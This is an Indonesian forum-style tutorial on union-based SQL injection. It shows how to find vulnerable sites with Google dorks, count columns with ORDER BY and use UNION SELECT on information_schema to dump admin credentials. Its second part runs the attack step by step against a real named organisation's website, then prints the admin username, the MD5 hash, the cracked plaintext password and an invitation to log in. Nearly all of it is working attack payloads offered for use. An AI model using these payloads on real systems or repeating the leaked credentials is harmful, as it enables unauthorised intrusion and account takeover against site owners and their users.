Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.
Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks
Code: |
inurl:trainers.php?id= Lebih lengkap, silakan dicari di Google Dorknya |
PART 1
Pilih salah satu dorks dan menambahkan inurl: sebelum(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini
Code: |
http://www.example.com/index.php?id=3 |
contoh
Code: |
http://www.example.com/index.php?id=3' |
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
Code: |
http://www.example.com/index.php?id=3 ORDER BY (number)-- |
capek translatenya
wkwkwkwkwkwkwkwkwkw
Yuk kita lanjutkan ke order by 8– kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad & catat kolom-kolom yang anda temukan.
Menemukan kolom yang dapat di akses
Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi & data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Code: |
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7-- |
Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code: |
http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7-- |
Code: |
http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7-- |
Hal ini biasanya bekerja pada versi database 5.* keatas.
Finding Database Names
Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version”
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
Code: |
http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata-- |
Jadi URL nya akan menjadi seperti ini:
Code: |
http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7-- |
Menemukan Nama Table
Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.
Urlnya akan tampak seperti berikut:
Code: |
http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()-- |
Menemukan Nama Kolom
Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
Url akan tampak seperti ini:
Code: |
http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()-- |
Misalkan nama colom seperti berikut:
admin_username
admin_password
Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
Code: |
http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename-- |
Sebagai contoh:
Code: |
http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin-- |
Credit: Madun & Diperbaiki Oleh BinusHacker Team
PART 2
Mari kita coba praktekkan cara diatas!Sebagai contoh kita mendapatkan target sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda ‘ di akhir URL, contohnya sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30'Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:
Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.
Kita akan mengetahuinya sampai ada informasi “Unknown Column“.
Lakukan pengecekan dengan menggunakan perintah “order by“.
Kita akan mencoba dari 1……..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:
Langkah pengetesannya adalah
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column
http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.
Langkah selanjutnya adalah, mencari kolom yang dapat di akses!
Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah “UNION SELECT number,of,columns–” untuk mengatahui kolom mana yang dapat di akses:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--
Anda akan menemukan seperti gambar berikut:
Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.
Langkah selanjutnya, mencari informasi versi database
SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja “@@version”, pada kolom dimana saja yang bisa dipakai.
Misalkan kolom “6″ kita ganti dengan “@@version”
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--
Akan muncul versi database 5.1.39, ini berarti database bisa di inject
Mengetahui Database Name
Langsung ajah kita replace kolom yang tadi digunakan “6,2,3″ dibagian mana saja, kita gunakan kolom “6″, kita ganti dengan code berikut “group_concat(schema_name)” , dan jangan lupa tambahkan “from information_schema.schemata–” sesudah kolom terakhir.
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Mengatahui Database Yang Dipakai
Langsung ajah ganti “group_concat(schema_name)” dengan “concat(database())” seperti contoh berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Selamat, anda telah mengetahui database yang dipakai saat ini adalah “cocobod_gh“.
Mengetahui Nama Tabel
Langsung aja ganti “group_concat(table_name)” dan tambahkan “from information_schema.tables where table_schema=database()–” setelah kolom terakhir.
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Mengatahui Nama Kolom
Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()–
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
Mengambil Informasi Yang Ada Di Dalam Kolom
Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:
Code:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--Exploit akan menjadi seperti berikut :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
Dari informasi di atas kita mendapatkan data: “comaster:2c39e3769d300f7e23f8a9e1e21773e7“ ,
Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: “2c39e3769d300f7e23f8a9e1e21773e7“, anda akan medapatkan result seperti dibawah:
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682
Selamat, anda sudah bisa login ke page dengan user & password di atas
Credit: Easy|Hack & Revision By BinusHacker Team